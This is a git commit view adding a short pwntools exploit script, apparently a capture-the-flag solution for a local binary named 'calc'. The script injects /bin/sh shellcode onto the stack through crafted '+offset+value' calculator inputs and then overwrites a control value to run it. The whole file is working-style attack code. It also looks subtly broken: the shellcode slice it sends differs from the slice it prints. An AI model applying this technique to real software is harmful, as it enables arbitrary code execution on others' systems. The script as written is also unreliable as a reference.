diff options
| author | Brett Weiland <brett_weiland@bpcspace.com> | 2020-11-20 21:16:43 -0600 |
|---|---|---|
| committer | Brett Weiland <brett_weiland@bpcspace.com> | 2020-11-20 21:16:43 -0600 |
| commit | 024d148d6ba06eb25980ba6a1abeb7628c28dd54 (patch) | |
| tree | 0b2088c9646a822f98f51ddf3db8507af414807e /exploit.py | |
| parent | 61fba08a991b1766f8eeabde43d517d42cc01fde (diff) | |
modified: calc.i64
new file: core
new file: exploit.py
new file: sout
modified: stest
Diffstat (limited to 'exploit.py')
| -rwxr-xr-x | exploit.py | 26 |
1 files changed, 26 insertions, 0 deletions
diff --git a/exploit.py b/exploit.py new file mode 100755 index 0000000..b765e85 --- /dev/null +++ b/exploit.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python3 +from pwn import * + + +context.binary = './calc' + +shellcode = asm(shellcraft.sh()) + +pid = process("./calc") + +print(shellcode.hex()) +print(context) + +shellen = len(shellcode) + +for exec_num,offset in enumerate(reversed(range(361, int(len(shellcode) / 4) + 361))): + pid.sendline("+{}+{}".format(offset, int.from_bytes(shellcode[((exec_num + 1) * 1):(exec_num * 4)], 'big'))) + print("+{}+{}".format(offset, int.from_bytes(shellcode[shellen - ((exec_num + 1) * 4):shellen - (exec_num * 4)], 'big'))) + + +pid.sendline("+360+135151459") +print("+360+135151459") +#pid.interactive() + +print(pid.recv()) + |